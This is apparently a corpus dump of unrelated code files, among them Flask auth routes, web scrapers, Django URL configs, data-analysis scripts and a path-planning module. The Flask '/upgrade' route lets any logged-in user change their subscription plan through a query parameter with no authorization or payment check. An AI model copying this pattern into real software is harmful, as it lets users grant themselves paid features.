'{0}/operation.html'.format(current_user.set_path)\n \n return render_template(set_theme, title='Operational')\n\n@core.route('/release')\ndef release():\n theme = request.args.get(\"theme\")\n if theme:\n updateTheme(theme)\n \n set_theme = '{0}/release.html'.format(current_user.set_path)\n\n return render_template(set_theme, title='Dark 
Theme')\n\n@core.route('/entitlement')\ndef entitlement():\n theme = request.args.get(\"theme\")\n if theme:\n updateTheme(theme)\n \n set_theme = '{0}/entitlement.html'.format(current_user.set_path)\n\n return render_template(set_theme, title='entitlement')\n\n# I decided to take out a payday loan on this shit. \n# http://flask.pocoo.org/docs/1.0/quickstart/?highlight=post#http-methods\n@core.route('/register', methods=['GET', 'POST'])\ndef register():\n if current_user.is_authenticated:\n return redirect(url_for('core.index'))\n if request.method == 'POST':\n user = User(email=request.form['userEmail'])\n # check if userName exist\n if User.query.filter_by(email = request.form['userEmail']).first() is not None:\n flash('Email is already taken. Please choose another email')\n return redirect(url_for('core.register'))\n # check if passwords match\n if request.form['inputPassword'] != request.form['confirmPassword']:\n flash('Passwords must match')\n return redirect(url_for('core.register'))\n user.set_password(request.form['inputPassword'])\n db.session.add(user)\n db.session.commit()\n flash('Congratulations, you are now a registered user!')\n login_user(user)\n return redirect(url_for('core.index'))\n return render_template('beta/auth/register.html', title='Support Request')\n\n@core.route('/login', methods=['GET', 'POST'])\ndef login(theme='default'):\n if current_user.is_authenticated:\n return redirect(url_for('core.index'))\n if request.method == 'POST':\n user = User.query.filter_by(email=request.form['userEmail']).first()\n if user is None or not user.check_password(request.form['inputPassword']):\n flash('Invalid username or password')\n return redirect(url_for('core.login'))\n login_user(user)\n next_page = request.args.get('next')\n if not next_page or url_parse(next_page).netloc != '':\n next_page = url_for('core.index')\n return redirect(next_page)\n '''\n\n '''\n return render_template('beta/auth/login.html', title='Sign In')\n\n@core.route('/logout')\ndef logout():\n logout_user()\n return redirect(url_for('core.index'))\n\n@core.route('/profile')\n@login_required\ndef profile():\n user = User.query.filter_by(id=current_user.id).first()\n return render_template(\n 'default/profile.html',\n user=user\n )\n\n@core.route('/people')\n@cache.cached(timeout=CACHE_TIMEOUT(), unless=CachingDisabled())\n@login_required\ndef people():\n users = User.query.order_by(User.id).all()\n return render_template(\n 'default/people.html',\n users=users\n )\n\n@core.route('/settings')\n@login_required\ndef settings():\n plans = Plan.query.all()\n\n return render_template(\n 'default/settings.html',\n plans=plans\n )\n\n@core.route('/upgrade')\n@login_required\ndef upgrade():\n current_user.plan_id = request.args.get('plan')\n db.session.commit()\n\n return redirect(request.referrer)","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":5076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"546129437","text":"# -*- coding: utf-8 -*-\nfrom urllib import request, parse\nfrom bs4 import BeautifulSoup\n\n# Link constants\n_URL_WEBSITE_RABOTA = 'http://rabota.ua/jobsearch/vacancy_list?regionId=3&keyWords={0}&period=3&pg={1}'\n_URL_WEBSITE_DOU = 'https://jobs.dou.ua/vacancies/?city=%D0%9E%D0%B4%D0%B5%D1%81%D1%81%D0%B0&search={0}'\n\n\ndef parse_dou(message_text):\n \"\"\"Function to parse jobs on dou.ua\n :param message_text: Job to search\n :returns String of found jobs\"\"\"\n\n url = _URL_WEBSITE_DOU \\\n 
.format(parse.quote_plus(message_text)) \\\n .replace(\" \", \"+\")\n soup = _get_soup(url)\n\n try:\n ul = soup.find('ul', class_='lt')\n\n string = \"\"\n for li in ul.find_all('li'):\n\n # Creating String answer\n string = string + \\\n '\\n' + li.find('a', class_='vt').text + \\\n '\\n(' + li.find('a', class_='company').text + ' )' + '\\n' + \\\n li.find('a', class_='vt')['href']\n\n return \"dou.ua\\n\" + string\n\n except AttributeError:\n return \"\"\n\n\ndef parse_rabota(message_text, page=1):\n \"\"\"Function to parse jobs on rabota.ua\n :param message_text: Job to search\n :param page: Current page of\n :returns String of jobs\"\"\"\n\n url = _URL_WEBSITE_RABOTA \\\n .format(parse.quote_plus(message_text), str(page)) \\\n .replace(\" \", \"+\")\n soup = _get_soup(url)\n\n if soup.find('p', class_='rua-p-t_20'):\n return \"\"\n\n string = \"\"\n try:\n table = soup.find('table', class_='vv')\n\n for tr in table.find_all('tr'):\n title = tr.find('a', class_='t').text\n title = title[:title.find('\\n')]\n\n company = tr.find('div', class_='s').text\n company = company[:company.find('\\n')]\n\n # Creating String answer\n string = string + \\\n '\\n' + title + \\\n '\\n( ' + company + ' )' + '\\n' + \\\n \"http://rabota.ua\" + tr.find('a', class_='t')['href']\n\n return \"rabota.ua\\n\" + string\n except AttributeError:\n if page >= 2:\n return \"rabota.ua\\n\" + string + \"\\n\\nMore vacancies here:\\n\" + url\n else:\n return string + parse_rabota(message_text, page + 1)\n\n\ndef _get_html(url):\n \"\"\"Function to get HTML\n :param url: url of website to read\n :return html of website\"\"\"\n\n return request.urlopen(url).read()\n\n\ndef _get_soup(url):\n \"\"\"Get soup by url\n :param url\n :return Soup of website\"\"\"\n\n return BeautifulSoup(\n _get_html(url),\n \"html.parser\"\n )\n","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":2629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"181982817","text":"import tempfile\nimport os\n\n\nEXPECTED_TIME_TO_BOOT = 60 # seconds\nRESET = \"\\033[0m\"\nBOLD = \"\\033[1m\"\nRED = \"\\033[31m\"\nOBJECTS = os.environ.get(\"OBJECTS\", \".osbuild-test\")\nOUTPUT_DIR = os.environ.get(\"OUTPUT_DIR\", \"output-test\")\nOSBUILD = os.environ.get(\"OSBUILD\", \"python3 -m osbuild --libdir .\").split(' ')\n","sub_path":"test/integration_tests/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"32351208","text":"from django.contrib import admin\nfrom django.urls import path\nfrom .views import *\n\nurlpatterns = [\n path('community/', community, name=\"community\"),\n path('writef/', writef, name=\"writef\"),\n path('map/', map, name=\"map\"),\n path('developers/', developers, name=\"developers\"),\n path('post_search/', post_search, name=\"post_search\"),\n]","sub_path":"FM/fmapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"135289118","text":"import numpy as np\nfrom gpar import GPARRegressor, log_transform\nfrom lab import B\n\nB.epsilon = 1e-8\n\n\ndef load(fp):\n data = np.genfromtxt(fp, delimiter=',', dtype=str)[:, 1:]\n header, data = data[0], data[1:].astype(float)\n header = [h[1:-1] for h in header] # Remove quotes.\n x = data[:, [header.index(name) for name in ['Xloc', 'Yloc']]]\n y = data[:, 
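# A brief aside on the URL quoting in parse_dou/parse_rabota above:
# urllib.parse.quote_plus already encodes spaces as '+', so the trailing
# .replace(" ", "+") is a no-op on its output.
from urllib import parse

assert parse.quote_plus("python developer") == "python+developer"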
[header.index(name) for name in ['Ni', 'Zn', 'Cd']]]\n return x, y\n\n\n# Load and extract data.\nx_train, y_train = load('examples/data/jura/jura_prediction.dat')\nx_test, y_test = load('examples/data/jura/jura_validation.dat')\n\n# Append first two outputs of test data to training data: the last one is\n# predicted.\nx_train = np.concatenate((x_train, x_test), axis=0)\ny_train_test = y_test.copy()\ny_train_test[:, -1] = np.nan\ny_train = np.concatenate((y_train, y_train_test), axis=0)\n\n# Fit and predict GPAR.\nmodel = GPARRegressor(scale=10.,\n linear=False, nonlinear=True, nonlinear_scale=1.0,\n noise=0.1,\n impute=True, replace=True, normalise_y=True,\n transform_y=log_transform)\nmodel.fit(x_train, y_train, fix=False)\nmeans_test = model.predict(x_test, num_samples=200, latent=True)\n\n# Compute MAE.\nprint('MAE:', np.nanmean(np.abs(y_test[:, -1] - means_test[:, -1])))\n","sub_path":"examples/paper/jura.py","file_name":"jura.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"159419658","text":"import os\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as ticker\nimport matplotlib as mpl\nimport seaborn as sb\nfrom federalRegister.loader import loadAgencyDF\nfrom nonparametricPlots import loessPlot\n\nfrom regcomments.dirs import *\n\n\n#Load data\nstreamsDF = pd.read_csv(os.path.join(dataDir,'streams','streamsWithRegChange.csv'))\nfrDocCommentsDF = pd.read_csv(os.path.join(dataDir,'comments','frDocComments.csv.gzip'),compression='gzip')\nultAgencyDocsDF = pd.read_csv(os.path.join(dataDir,'streams','ultAgencyDocuments.csv'))\norgCommentsDF = pd.read_csv(os.path.join(dataDir,'orgs','orgComments.csv'))\nagencyDF = loadAgencyDF()\n\n\n\n\nstreamsDF = pd.merge(streamsDF,agencyDF[['id','short_name']].rename(columns={'id':'ult_agency_id','short_name':'agency'}),'left')\n\n\nstreamsDF['publication_date'] = pd.to_datetime(streamsDF['publication_date'])\n\nstreamsDF['year'] = streamsDF['publication_date'].dt.year\nstreamsDF['year_float'] = streamsDF['year'] + streamsDF['publication_date'].dt.dayofyear / 365.25\n\n# Drop streams that include docs with a very large number of agencies\nstreamsDF['n_streams'] = streamsDF.groupby('document_number')['stream_id'].transform('nunique')\nstreamsDF[streamsDF['n_streams']<=5]\n\n# Drop streams that have a very large number of documents\nstreamsDF['n_docs'] = streamsDF.groupby('stream_id')['document_number'].transform('nunique')\nstreamsDF[streamsDF['n_docs'] <= 10]\n\n#Flag streams with exactly one proposal and one rule\nstreamsDF['is_proposal'] = streamsDF['type'] == 'Proposed Rule'\nstreamsDF['is_rule'] = streamsDF['type'] == 'Rule'\nstreamsDF['is_simple'] = streamsDF['type'].isin(['Proposed Rule','Rule','Notice','Comment Extension','ANPRM'])\n\n\nstreamsDF['simple'] = (streamsDF.groupby('stream_id')['is_proposal'].transform('sum') == 1) \\\n & (streamsDF.groupby('stream_id')['is_rule'].transform('sum') == 1) \\\n & (streamsDF.groupby('stream_id')['is_simple'].transform('sum') == streamsDF['n_docs'])\n\nstreamsDF['complete'] = (streamsDF.groupby('stream_id')['is_proposal'].transform('sum') >0) \\\n & (streamsDF.groupby('stream_id')['is_rule'].transform('sum') >0)\n\n\n# Add comment counts for extensions to the previous (non-extension) document\nstreamsDF = streamsDF.sort_values(['stream_id','publication_date','stream_order'])\nstreamsDF['is_step'] = ~streamsDF['type'].isin(['Notice','Comment 
Extension'])\nstreamsDF['stream_step'] = streamsDF.groupby('stream_id')['is_step'].cumsum()\n\n# Add change in lengths and paragraphs\ndiffDF = streamsDF[streamsDF['is_step']]\ndiffDF = diffDF.sort_values(['stream_id','stream_step'])\ndiffDF['legal_length_diff'] = diffDF.groupby('stream_id')['legal_length'].diff().shift(-1)\ndiffDF['discussion_length_diff'] = diffDF.groupby('stream_id')['discussion_length'].diff().shift(-1)\ndiffDF['legal_paragraphs_diff'] = diffDF.groupby('stream_id')['legal_paragraphs'].diff().shift(-1)\n\nfor c in 'legal_length','discussion_length','legal_paragraphs':\n    diffDF[c+'_growth'] = diffDF[c+'_diff']/(diffDF[c] + 0.5*diffDF[c+'_diff'])\n\ndiffDF = diffDF[['stream_id','document_number']+[c for c in diffDF if c.endswith('_diff') or c.endswith('_growth')]]\n\nstreamsDF = pd.merge(streamsDF,diffDF,'left')\n\n\n\n#Compile frDoc comment counts\n\n#Link frDoc comments to (ult) agencies\ncommentCountsDF = pd.merge(frDocCommentsDF,agencyDF[['short_name','ult_agency_id']].rename(columns={'short_name':'agencyAcronym'}),'left')\n\ncommentCountsDF['count'] = 1\ncommentCountsDF['orgs'] = commentCountsDF['documentId'].isin(orgCommentsDF['documentId'])\ncommentCountsDF['attachments'] = commentCountsDF['attachmentCount'] > 0\ncommentCountsDF['org_attachments'] = commentCountsDF['orgs']*commentCountsDF['attachmentCount']\n\ncommentCountsDF = commentCountsDF.groupby(['document_number','ult_agency_id'])[['count','attachments','orgs','org_attachments','copies']].sum().reset_index()\n\n#Identify linked documents that received no comments\nlinkedDF = ultAgencyDocsDF[ultAgencyDocsDF['reg_dot_gov_link']][['document_number','ult_agency_id']].drop_duplicates()\ncommentCountsDF = pd.merge(commentCountsDF,linkedDF,'outer')\n\nfor c in ['count','attachments','orgs','org_attachments','copies']:\n    commentCountsDF[c] = commentCountsDF[c].fillna(0)\n\n# commentCountsDF['comment_linked'] = True\n\n# streamsDF.head(1).T\n# commentCountsDF.head(1).T\n# set(streamsDF.columns) & set(commentCountsDF.columns)\n\nstreamCommentsDF = pd.merge(streamsDF,commentCountsDF)\n\n#Merge comment counts for comment extensions\nagg = {c:'first' for c in streamCommentsDF.columns if c not in ['stream_id','stream_step']}\nagg.update({c:'sum' for c in ['count','copies','attachments','org_attachments']})\nstreamCommentsDF = streamCommentsDF.groupby(['stream_id','stream_step']).agg(agg).reset_index()\n\n# streamCommentsDF[streamCommentsDF['simple']].groupby('stream_id')['document_number'].count().value_counts()\n\n\n\nsimpleProposalsDF = streamsDF[streamsDF['simple'] & (streamsDF['type']=='Proposed Rule')].copy()\nsimpleProposalsAnnualDF = simpleProposalsDF.groupby('year').mean().reset_index()\n\n\nsimpleProposalCommentsDF = streamCommentsDF[streamCommentsDF['simple'] & (streamCommentsDF['type'] == 'Proposed Rule')]\n\n\n\n#Define plot style and helper functions-----------------------------------------\n\n\n#Turn off spines\nmpl.rcParams['axes.spines.top'] = False\nmpl.rcParams['axes.spines.right'] = False\nmpl.rcParams['axes.spines.bottom'] = False\nmpl.rcParams['axes.spines.left'] = False\n\n#Hide legend frame\nmpl.rcParams['legend.framealpha'] = 0\n\n\n\ndef formatLogscaleTicks(daxis):\n    '''\n    pass ax.axis or ax.yaxis to format that axis' ticks as log-scale values\n    '''\n    daxis.set_major_locator(ticker.MaxNLocator(integer=True))\n    daxis.set_major_formatter(ticker.FuncFormatter(lambda v,p:'$10^{{{:0.0f}}}$'.format(v)))\n\n\ndef loglogLoessPlot(x_column,y_column,dataDF,**loes_args):\n    data = dataDF[[x_column,y_column]]\n    
data = np.log10(data)\n data = data[(data >=0).all(axis=1)]\n\n ax = loessPlot(X=data[x_column],y=data[y_column],**loes_args)\n\n for axis in ax.xaxis,ax.yaxis:\n formatLogscaleTicks(axis)\n\n return ax\n\n\n# Summaries of change-----------------------------------------------------------\n\nplt.figure(figsize=(6,4))\nplt.subplot(2,1,1)\ndf = streamsDF[streamsDF['simple'] & (streamsDF['type']=='Proposed Rule')]\nax = sb.kdeplot(np.log10(df['legal_paragraphs']+1),gridsize=200,shade=True,lw=1,alpha=0.5,legend=False)\nax = sb.kdeplot(np.log10(df['discussion_paragraphs']+1),gridsize=200,shade=True,lw=1,alpha=0.5,legend=False)\nformatLogscaleTicks(ax.xaxis)\n\nax.set_ylabel('Proposed Rule density')\n\ncolorCycle = plt.rcParams['axes.prop_cycle'].by_key()['color']\nax.legend(handles=[mpl.patches.Patch(color=colorCycle[0],alpha=0.5,label='Legal paragraphs'),\n mpl.patches.Patch(color=colorCycle[1],alpha=0.5,label='Discussion paragraphs')])\n\nplt.subplot(2,1,2,sharex=ax)\ndf = streamsDF[streamsDF['simple'] & (streamsDF['type']=='Rule')]\nax = sb.kdeplot(np.log10(df['legal_paragraphs']+1),gridsize=200,shade=True,lw=1,alpha=0.5,legend=False)\nax = sb.kdeplot(np.log10(df['discussion_paragraphs']+1),gridsize=200,shade=True,lw=1,alpha=0.5,legend=False)\nformatLogscaleTicks(ax.xaxis)\nax.set_xlabel('paragraph count + 1')\nax.set_ylabel('Rule density')\n\nplt.savefig(os.path.join(plotDir,'simpleStreamsParagraphCountDensity.png'),bbox_inches='tight',dpi=100)\n\n\n\ndf = simpleProposalsDF[simpleProposalsDF['legal_paragraphs']>0]\n\nplt.figure(figsize=(6,4))\nax = loessPlot(np.log10(df['legal_paragraphs']),df['legal_paragraphs_growth'],scatter_kws={'s':3,'alpha':0.5},span=0.5)\nax.axhline(c='k',lw=1,alpha=0.5)\nformatLogscaleTicks(ax.xaxis)\nax.set_xlabel('legal paragraphs')\nax.set_ylabel('legal growth')\nplt.savefig(os.path.join(plotDir,'simpleProposalLegalParagraphGrowthByLegalParagraphs.png'),bbox_inches='tight',dpi=100)\n\n\nplt.figure(figsize=(6,4))\nax = loessPlot(np.log10(df['legal_paragraphs']),df['legal_paragraph_jaccard'],scatter_kws={'s':3,'alpha':0.5},span=0.5)\nax.axhline(c='k',lw=1,alpha=0.5)\nax.set_xlabel('legal paragraphs')\nax.set_ylabel('legal paragraph Jaccard index')\nplt.savefig(os.path.join(plotDir,'simpleProposalLegalParagraphJaccardByLegalParagraphs.png'),bbox_inches='tight',dpi=100)\n\n\n\n# Annual trends-----------------------------------------------------------------\n\n# plt.scatter(simpleProposalsAnnualDF['year'],simpleProposalsAnnualDF['legal_paragraph_jaccard'],c='k')\n#\n# plt.scatter(simpleProposalsAnnualDF['year'],simpleProposalsAnnualDF['legal_length'],c='k')\n#\n# plt.scatter(simpleProposalsAnnualDF['year'],simpleProposalsAnnualDF['legal_length_diff'],c='k')\n#\n# plt.scatter(simpleProposalsAnnualDF['year'],simpleProposalsAnnualDF['legal_length_growth'],c='k')\n#\n#\n# plt.figure(figsize=(6,4))\n# df = simpleProposalsDF[['year_float','legal_length_growth']].dropna()\n# ax=loessPlot(df['year_float'],df['legal_length_growth'],scatter=False,span=0.3)\n# ax.set_xlabel('Year')\n# ax.set_ylabel('legal growth')\n# plt.savefig(os.path.join(plotDir,'legalParagraphGrowthByTime.png'),bbox_inches='tight',dpi=100)\n#\n#\n# plt.figure(figsize=(6,4))\n# df = simpleProposalsDF[['year_float','legal_paragraph_jaccard']].dropna()\n# ax=loessPlot(df['year_float'],df['legal_paragraph_jaccard'],scatter=False,span=0.2)\n# ax.set_xlabel('Year')\n# ax.set_ylabel('legal paragraph Jaccard index')\n# 
plt.savefig(os.path.join(plotDir,'legalParagraphJaccardByTime.png'),bbox_inches='tight',dpi=100)\n#\n#\n# df = simpleProposalsDF[np.abs(simpleProposalsDF['legal_length_growth'])<2]\n# plt.scatter(df['year_float'],df['legal_length_growth'])\n#\n# loessPlot(df['year_float'],df['legal_length_growth'],scatter=False,span=0.2)\n# loessPlot(df['year_float'],df['legal_text_jaccard'],scatter=False,span=0.2)\n# loessPlot(df['year_float'],df['legal_length_diff'],scatter=False,span=0.2)\n#\n#\n# df = simpleProposalsDF.copy()\n# df['final_length'] = df['legal_length']+df['legal_length_diff']\n# loglogLoessPlot('legal_length','final_length',df,span=0.2,scatter_kws={'s':3})\n\n\n\n# Agency-level plots------------------------------------------------------------\n\n# dataDF = streamCommentsDF[streamCommentsDF.groupby('agency')['stream_id'].transform('nunique')>100]\ndataDF = streamsDF.groupby('agency').mean()\ndataDF['n_proposals'] = streamsDF.groupby('agency')['is_proposal'].sum()\ndataDF['total_legal_paragraphs'] = streamsDF.groupby('agency')['legal_paragraphs'].sum()\ndataDF = dataDF.reset_index()\n\nplt.figure(figsize=(6,4))\nplt.scatter(np.log10(dataDF['n_proposals']),np.log10(dataDF['total_legal_paragraphs']),s=10)\nax = plt.gca()\nax.set_xlabel('Number of proposals published')\nax.set_ylabel('Total legal paragraphs published')\nformatLogscaleTicks(ax.xaxis)\nformatLogscaleTicks(ax.yaxis)\nfor i,x,y,agency in dataDF[['n_proposals','total_legal_paragraphs','agency']].itertuples():\n if x > 0 and y>0:\n if np.random.uniform(0,1) < 3/(0.3*i+1):\n plt.text(np.log10(x)+0.05,np.log10(y),agency,verticalalignment='center')\nplt.savefig(os.path.join(plotDir,'agencyTotalLegalParagraphsByProposals.png'),bbox_inches='tight',dpi=100)\n\n\n\ndf = simpleProposalsDF[simpleProposalsDF['legal_paragraphs']>0]\ndataDF = df.groupby('agency').mean()\ndataDF['n_proposals'] = df.groupby('agency')['document_number'].count()\ndataDF = dataDF.reset_index()\n\ndataDF = dataDF[dataDF['n_proposals']>100]\n\nplt.figure(figsize=(6,4))\nplt.scatter(dataDF['legal_paragraph_jaccard'],dataDF['legal_paragraphs_growth'],s=0.3*dataDF['n_proposals'],alpha=0.7)\nax = plt.gca()\nax.set_xlabel('Legal paragraph Jaccard index')\nax.set_ylabel('Legal paragraph growth')\nfor i,x,y,n,agency in dataDF[['legal_paragraph_jaccard','legal_paragraphs_growth','n_proposals','agency']].itertuples():\n plt.text(x+3e-4*np.sqrt(n),y,agency,verticalalignment='center')\nplt.savefig(os.path.join(plotDir,'agencyLegalParagraphGrowthByLegalParagraphJaccard.png'),bbox_inches='tight',dpi=100)\n\n\n\n\n# Comments and change plots-----------------------------------------------------\n\n#Plot relationship between client expenditures and commenting\ndataDF = simpleProposalCommentsDF.copy()\ndataDF['copies-attachments'] = dataDF['copies'] - dataDF['attachments']\n\ndataDF = dataDF[['attachments','copies-attachments','legal_paragraphs','legal_paragraphs_growth','legal_paragraph_jaccard']].dropna()\n\ndataDF = dataDF[dataDF['legal_paragraphs']>0]\n\nplt.figure(figsize=(6,7))\n\nax = plt.subplot(2,1,1)\nax = loessPlot(np.log10(dataDF['attachments']+1),dataDF['legal_paragraphs_growth'],scatter_kws={'s':3},span=1,ax=ax)\nax = loessPlot(np.log10(dataDF['copies-attachments']+1),dataDF['legal_paragraphs_growth'],scatter_kws={'s':3},span=1,ax=ax)\nformatLogscaleTicks(ax.xaxis)\nax.set_ylabel('Legal paragraph growth')\nax.legend(['x = Attachments + 1','x = Copies - Attachments + 1'],loc='upper right')\n\nax = plt.subplot(2,1,2)\nax = 
loessPlot(np.log10(dataDF['attachments']+1),dataDF['legal_paragraph_jaccard'],scatter_kws={'s':3},span=1,ax=ax)\nax = loessPlot(np.log10(dataDF['copies-attachments']+1),dataDF['legal_paragraph_jaccard'],scatter_kws={'s':3},span=1,ax=ax)\nformatLogscaleTicks(ax.xaxis)\nax.set_ylabel('Legal paragraph Jaccard index')\n\nplt.savefig(os.path.join(plotDir,'simpleProposalLegalParagraphGrowthAndJaccardByAttachmentsAndCopies.png'),bbox_inches='tight',dpi=100)\n\n\n\nplt.figure(figsize=(6,3.5))\nax = loessPlot(np.log10(dataDF['attachments']+1),np.log10(dataDF['legal_paragraphs']),scatter_kws={'s':3},span=1)\nax = loessPlot(np.log10(dataDF['copies-attachments']+1),np.log10(dataDF['legal_paragraphs']),scatter_kws={'s':3},span=1)\nformatLogscaleTicks(ax.xaxis)\nformatLogscaleTicks(ax.yaxis)\nax.set_ylabel('Legal paragraphs')\nax.legend(['x = Attachments + 1','x = Copies - Attachments + 1'])\n\nplt.savefig(os.path.join(plotDir,'simpleProposalLegalParagraphsByAttachmentsAndCopies.png'),bbox_inches='tight',dpi=100)\n","sub_path":"analysis/regChange.py","file_name":"regChange.py","file_ext":"py","file_size_in_byte":13781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"34377214","text":"#!/usr/bin/env python\n# -*- coding: utf8 -*-\n\n\n\"\"\"\nSimple python3 package manager.\n \n init\n Initial a new egg\n install\n Install all eggs in `eggs.txt`\n install -S section [eggs ...]\n Install `eggs` into the `section`\n install [eggs ...]\n Equals to `install -S prod [eggs ...]\n update\n Update all eggs in `eggs.txt`\n uninstall [eggs ...]\n Uninstall the given eggs\n list\n List all eggs in `eggs.txt`\n search\n Search egg\n -h\n this\n\"\"\"\n\nfrom argparse import ArgumentParser\n\nfrom . import search, install, uninstall, update, init, show, __VERSION__, __TITLE__\n\n\ndef parse_args():\n parser = ArgumentParser(prog=__TITLE__)\n subparsers = parser.add_subparsers(dest='action')\n parser_init = subparsers.add_parser('init', help='Initial an egg')\n parser_init.add_argument('path', nargs='?', const='.', default='.', help='egg directory')\n parser_install = subparsers.add_parser('install', help='Install python eggs')\n parser_install.add_argument('-S', '--section', nargs=1, help='Section of eggs')\n parser_install.add_argument('eggs', nargs='*', help='python eggs')\n parser_uninstall = subparsers.add_parser('uninstall', help='Uninstall eggs')\n parser_uninstall.add_argument('eggs', nargs='+', help='Python eggs')\n subparsers.add_parser('update', help='Update eggs')\n parser_list = subparsers.add_parser('list', help='List eggs')\n parser_list.add_argument('-a', '--all', nargs='?', const='all', default='', help='List all eggs')\n parser_search = subparsers.add_parser('search', help='Search eggs')\n parser_search.add_argument('eggs', nargs=1, help='Python eggs')\n subparsers.add_parser('version', help='Version')\n\n args = parser.parse_args()\n\n if args.action == 'init':\n init(args.path)\n elif args.action == 'install':\n install(args.eggs, args.section)\n elif args.action == 'update':\n update()\n elif args.action == 'list':\n show(args.all)\n elif args.action == 'search':\n search(args.eggs[0])\n elif args.action == 'uninstall':\n uninstall(args.eggs)\n elif args.action == 'version':\n print('eggs ' + __VERSION__)\n else:\n parser.print_help()\n\n\ndef main():\n 
parse_args()\n","sub_path":"mysite/venv/lib/python3.7/site-packages/eggs/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":2278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"369418153","text":"from django.contrib import admin\nfrom django.urls import path\nfrom .views import MonthWithScheduleCalendar, ScheduleCreate, ScheduleUpdate, ScheduleDetail, delete_data, signupview, loginview, logoutview\n\napp_name = 'app'\n\nurlpatterns = [\n path('', MonthWithScheduleCalendar.as_view(), name='month_with_schedule'),\n path('month_with_schedule///', MonthWithScheduleCalendar.as_view(), name='month_with_schedule'),\n path('create/', ScheduleCreate.as_view(), name='create'),\n path('update//', ScheduleUpdate.as_view(), name='update'),\n path('detail//', ScheduleDetail.as_view(), name='detail'),\n path('delete//', delete_data, name='delete'),\n path('signup/', signupview, name='signup'),\n path('login/', loginview, name='login'),\n path('logout/', logoutview, name='logout'),\n]\n","sub_path":"mustlecalendarproject/mustlecalendarapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"243728827","text":"#!/usr/bin/python\n\nimport argparse\n\n\ndef find_max_profit(prices):\n # l\n # [1050, 270, 1540, 3800, 2]\n # h\n store = dict()\n best = None\n\n for price in prices:\n for key in store:\n if store[key] is None or store[key] < price - key:\n store[key] = price - key\n\n if best is None or store[key] > best:\n best = store[key]\n\n store[price] = -float(\"inf\")\n\n return best\n\n\nif __name__ == '__main__':\n # This is just some code to accept inputs from the command line\n parser = argparse.ArgumentParser(\n description='Find max profit from prices.')\n parser.add_argument('integers', metavar='N', type=int,\n nargs='+', help='an integer price')\n args = parser.parse_args()\n\n print(\"A profit of ${profit} can be made from the stock prices {prices}.\".format(\n profit=find_max_profit(args.integers), prices=args.integers))\n","sub_path":"stock_prices/stock_prices.py","file_name":"stock_prices.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"162561695","text":"from abc import ABCMeta, abstractmethod\nfrom prrt.vehicle import Vehicle\nfrom prrt.primitive import PoseR2S1, CPoint, PointR2\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport prrt.helper as helper\nfrom typing import List\nfrom prrt.grid import ObstacleGrid, CPointsGrid\nimport math\n\n\nclass PTG(metaclass=ABCMeta):\n \"\"\"\n Base class for parametrized trajectory generators.\n \"\"\"\n\n def __init__(self, size: float, vehicle: Vehicle, resolution: float):\n \"\"\"\n\n :type size: float > 0 (in meters). Map will extend from (-size,-size) to (size, size)\n :type vehicle: Vehicle. provides car_vertices and kinematics of the vehicle\n :type resolution: float > 0 (in meters). 
Resolution of map grid\n \"\"\"\n self._vehicle = vehicle\n self._delta_t = 0.0005\n self._alpha_resolution = np.deg2rad(3.)\n self._t_max = 100.0\n self._n_max = 10000\n self._d_max = size\n self.c_points = [] # type: List[List[CPoint]]\n self.idx_to_alpha = []\n self._turning_radius_ref = 0.1\n self.distance_ref = size\n self.obstacle_grid = ObstacleGrid(size, resolution)\n self._c_points_grid = CPointsGrid(size, resolution)\n self.name = 'PTG'\n\n @abstractmethod\n def build_cpoints(self):\n \"\"\"\n Builds a distance map for the given PTG, map size, resolution and vehicle\n \"\"\"\n pass\n\n @abstractmethod\n def get_distance(self, from_pose: PoseR2S1, to_pose: PoseR2S1) -> float:\n delta_pose = to_pose - from_pose\n return delta_pose.norm\n\n def alpha2idx(self, alpha: float) -> int:\n alpha = helper.wrap_to_npi_pi(alpha)\n if abs(alpha) > self._vehicle.alpha_max:\n alpha = np.sign(alpha) * self._vehicle.alpha_max\n delta = alpha + self._vehicle.alpha_max\n return int(np.rint(delta / self._alpha_resolution))\n\n @abstractmethod\n def inverse_WS2TP(self, p: PoseR2S1, tolerance=0.1) -> (bool, int, float):\n pass\n\n def get_cpoint_at_d(self, d: float, k: int) -> CPoint:\n assert k < len(self.c_points), 'k value exceeds bound'''\n for c_point in self.c_points[k]:\n if c_point.d >= d:\n return c_point\n\n\nclass CPTG(PTG):\n \"\"\"\n Circular path PTG. Paths are generated by selecting a fixed\n alpha\n \"\"\"\n\n def __init__(self, size: float, vehicle: Vehicle, resolution: float, K: int):\n self._K = K\n super(CPTG, self).__init__(size, vehicle, resolution)\n\n def build_cpoints(self):\n \"\"\"\n Builds a distance map for the given PTG, map size, resolution and vehicle\n \"\"\"\n k_theta = 1.\n min_dist = 0.015\n turning_radius = 0.1\n print('Starting building cpoints for {0}'.format(self.name))\n for alpha in np.arange(-self._vehicle.alpha_max, self._vehicle.alpha_max + self._alpha_resolution,\n self._alpha_resolution):\n t = 0.\n n = 0\n v = self._K * self._vehicle.v_max\n dist = 0.\n pose = PoseR2S1(0, 0, 0)\n last_pose = PoseR2S1(0, 0, 0)\n w = (alpha / np.pi) * self._vehicle.w_max\n rotation = 0. 
